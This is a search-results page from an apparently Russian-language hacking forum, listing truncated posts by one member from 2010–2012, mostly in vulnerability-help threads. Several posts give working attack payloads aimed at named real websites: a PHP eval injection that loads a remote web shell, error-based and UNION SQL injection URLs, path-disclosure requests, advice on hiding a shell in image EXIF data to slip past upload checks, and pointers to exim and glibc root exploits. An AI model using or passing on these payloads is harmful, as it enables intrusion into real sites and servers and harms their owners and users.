 |
 |
 | |
 | |
| |
 |
 |
FORUMS | |
MEMBERS | |
RECENT POSTS |  |
LOG IN |
|
||||||
|
Показано с 1 по 25 из 500.
На поиск затрачено 0.07 сек. Поиск: Сообщения от: Pashkela |
Раздел: Песочница
17.04.2012, 03:21
|
|
Ответов: 11
Просмотров: 18,566
Автор
Pashkela
http://www.datingfast.com/wp-atom.php?p1r0=eval(fi...http://www.datingfast.com/wp-atom.php?p1r0=eval(file_get_contents(base64_decode(тут_без_кавычек_адрес_твоего_шелла_например_http://site/shell.txt_только_в_base64))); т.е. что-то типо этого: ... |
|
Раздел: Песочница
17.04.2012, 01:25
|
|
Ответов: 11
Просмотров: 18,566
Автор
Pashkela
вот для начала и кури, что там выводится....вот для начала и кури, что там выводится. Например allow_url_fopen = off - и всё, забудь про шелл с другого сайта - онли только грузить с локали. Хочешь грамотный ответ - давай инфу по ключевым... |
|
Раздел: Уязвимости
14.04.2012, 11:51
|
|
Ответов: 732
Просмотров: 410,761
Автор
Pashkela
/usr/sbin/exim -bV
если подходит по версии и.../usr/sbin/exim -bV если подходит по версии и билду, то: http://www.exploit-db.com/exploits/15725/ |
|
Раздел: Уязвимости
14.04.2012, 00:57
|
|
Ответов: 24,371
Важно: Ваши вопросы по уязвимостям.
Просмотров: 613,734
Автор
Pashkela
http://good-life.kz/ru/cat.php?id=5'or+1+group+by+...http://good-life.kz/ru/cat.php?id=5'or+1+group+by+concat(left((select+distinct+table_name+from+information_schema.tables+where+table_schema!=0x696e666f726d6174696f6e5f736368656d61+limit+1,1),64),rand(... |
|
Раздел: Уязвимости
12.04.2012, 02:54
|
|
Ответов: 732
Просмотров: 410,761
Автор
Pashkela
2 Expl0ited, со всем уважением:
...2 Expl0ited, со всем уважением: https://rdot.org/forum/showthread.php?p=23147#post23147 рекомендации, что вносить, когда просите что-то порутать: |
|
Раздел: Статьи
09.04.2012, 01:13
|
|
Ответов: 168
Просмотров: 133,374
Автор
Pashkela
Для тех, кто не в курсе - из base64 кодировки...Для тех, кто не в курсе - из base64 кодировки можно спокойно вырезать все "=" - и будет работать также прекрасно (запостенно только потому, что ТС удалил свои косяки, связанные с этим моментом, что... |
|
Раздел: Статьи
02.04.2012, 04:17
|
|
Ответов: 40
Просмотров: 26,487
Автор
Pashkela
ТС, RTFM:
1. Удали ссылку реального сайта...ТС, RTFM: 1. Удали ссылку реального сайта (мозг есть вообще?) 2. Удали ники тех, кого ты благодаришь, вставляя реальные ссылки на реальные сайты (в скобках тоже самое, что в п.1) 3. Никогда... |
|
Раздел: Уязвимости
19.03.2012, 04:27
|
|
Ответов: 732
Просмотров: 410,761
Автор
Pashkela
|
|
Раздел: Уязвимости
09.03.2012, 19:24
|
|
Ответов: 732
Просмотров: 410,761
Автор
Pashkela
https://rdot.org/forum/showthread.php?t=817&page=3...https://rdot.org/forum/showthread.php?t=817&page=3 https://rdot.org/forum/attachment.php?attachmentid=173&d=1317225254 -> glibc_nondebian.sh если mount правильный, то сплойт запускать из... |
|
Раздел: Задания/Квесты/CTF/Конкурсы
21.01.2012, 18:54
|
|
Ответов: 41
Просмотров: 34,978
Автор
Pashkela
Глубокое заблуждение. Именно такие квесты...Глубокое заблуждение. Именно такие квесты тренируют мозг и подготавливают к неожиданностям в реале. Про куки кстати в реале встречал похожую ситуацию PS: мне понравилось, thx 2 AdReNa1!Ne |
|
Раздел: Задания/Квесты/CTF/Конкурсы
20.01.2012, 22:21
|
|
Ответов: 41
Просмотров: 34,978
Автор
Pashkela
|
|
Раздел: Уязвимости
05.07.2010, 03:16
|
|
Ответов: 24,371
Важно: Ваши вопросы по уязвимостям.
Просмотров: 613,734
Автор
Pashkela
раскрытие путей:
...раскрытие путей: http://site.com/phpPgAdmin/sqledit.php?server[]=%3A5432%3Aallow&action=sql http://site.com/phpPgAdmin/libraries/lib.inc.php |
|
Раздел: Уязвимости
30.06.2010, 00:00
|
|
Ответов: 24,371
Важно: Ваши вопросы по уязвимостям.
Просмотров: 613,734
Автор
Pashkela
вот конкретно относительно вашего примерчика и...вот конкретно относительно вашего примерчика и таблицы News: HOST: www.feliceincontro.net ----------------------------------------- System information:... |
|
Раздел: Уязвимости
29.06.2010, 23:32
|
|
Ответов: 24,371
Важно: Ваши вопросы по уязвимостям.
Просмотров: 613,734
Автор
Pashkela
Пример в студию ускорил бы решение вашей...Пример в студию ускорил бы решение вашей проблемы, да, бывают специфичные ситуации PS: Вообще not in и перечислять там имена колонок тупо - тухлец способ по определению Вот если брать одну из... |
|
Раздел: Уязвимости
29.06.2010, 22:09
|
|
Ответов: 24,371
Важно: Ваши вопросы по уязвимостям.
Просмотров: 613,734
Автор
Pashkela
1. Подобрать кол-во полей, а не пытаться сразу...1. Подобрать кол-во полей, а не пытаться сразу лить шелл http://www.buddhatour.ru/new/?link=1+union+select+1,version(),3,4+limit+1,1--+ или так: ... |
|
Раздел: Уязвимости
27.06.2010, 17:09
|
|
Ответов: 24,371
Важно: Ваши вопросы по уязвимостям.
Просмотров: 613,734
Автор
Pashkela
версия пихипе какая? Если ниже 5 - не будет...версия пихипе какая? Если ниже 5 - не будет работать. Плюс могли и пропатчить, так сплойт - паблик. Но и для 4-ой версии есть вариант - исполнение локального файла, при знании асболютного пути и при... |
|
Раздел: Уязвимости
24.06.2010, 22:29
|
|
Ответов: 24,371
Важно: Ваши вопросы по уязвимостям.
Просмотров: 613,734
Автор
Pashkela
Очень часто этот скрипт ошибается, особенно когда...Очень часто этот скрипт ошибается, особенно когда нет ошибки при наборе неправильно/несуществуюешего урла А проверить - да, только ручками, мало ли что скрипты выдают |
|
Раздел: Уязвимости
24.06.2010, 11:29
|
|
Ответов: 24,371
Важно: Ваши вопросы по уязвимостям.
Просмотров: 613,734
Автор
Pashkela
http://www.nortun.am/pages.php?al=news&pid=1&id=56...http://www.nortun.am/pages.php?al=news&pid=1&id=568'+and+(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)*2))+from+sed_zpages+group+by+2+limit+1)a)--+&act=more |
|
Раздел: Уязвимости
23.06.2010, 20:32
|
|
Ответов: 24,371
Важно: Ваши вопросы по уязвимостям.
Просмотров: 613,734
Автор
Pashkela
можно, если будет LFI в студию, откуда я знаю,...можно, если будет LFI в студию, откуда я знаю, что за логи апача ты там подключаешь и откуда ты берешь к ним пути и видно ли ошибки вообще и т.д. |
|
Раздел: Уязвимости
23.06.2010, 20:25
|
|
Ответов: 24,371
Важно: Ваши вопросы по уязвимостям.
Просмотров: 613,734
Автор
Pashkela
2 Konqi:
Твоя тема аж на 1399 странице,...2 Konqi: Твоя тема аж на 1399 странице, посмотри номер этой, ты что, правда думаешь, так можно строить диалог? И с чего ты взял, что вот так вот просто можно через 3 страницы и два дня писать:... |
|
Раздел: Уязвимости
23.06.2010, 20:16
|
|
Ответов: 24,371
Важно: Ваши вопросы по уязвимостям.
Просмотров: 613,734
Автор
Pashkela
Нет, я конечно понимаю, жара и всё такое, но ты...Нет, я конечно понимаю, жара и всё такое, но ты разве k2b1~ ? Почему ты мне пишешь про какие-то логи апача? Что за хрень вы тут понаписали вообще на последних двух страницах?) Один просит как... |
|
Раздел: Уязвимости
23.06.2010, 20:05
|
|
Ответов: 24,371
Важно: Ваши вопросы по уязвимостям.
Просмотров: 613,734
Автор
Pashkela
Что, залил такую картинку и шелл заработал?...Что, залил такую картинку и шелл заработал? Круть, надо взять на вооружение |
|
Раздел: Уязвимости
21.06.2010, 19:42
|
|
Ответов: 24,371
Важно: Ваши вопросы по уязвимостям.
Просмотров: 613,734
Автор
Pashkela
А ты запиши в EXIF, а не в конец файла, и, если...А ты запиши в EXIF, а не в конец файла, и, если картинка меняет размер после заливки (скриптом), то попробуй залить картинку такого же размера, как и тестируемая - может и прокатит PS: Ну и... |
|
Раздел: Уязвимости
18.06.2010, 20:24
|
|
Ответов: 24,371
Важно: Ваши вопросы по уязвимостям.
Просмотров: 613,734
Автор
Pashkela
http://tullamorechamber.com/Adm/MyLogin.php?Page=/...http://tullamorechamber.com/Adm/MyLogin.php?Page=/Adm/ |
|
Раздел: Уязвимости
18.06.2010, 16:23
|
|
Ответов: 24,371
Важно: Ваши вопросы по уязвимостям.
Просмотров: 613,734
Автор
Pashkela
попробуй в эту сторону глянуть, у них там этот...попробуй в эту сторону глянуть, у них там этот форум: http://forum.snitz.com/ бесплатный, скачай и посмотри таблицы/колонки |
| Показано с 1 по 25 из 500. |
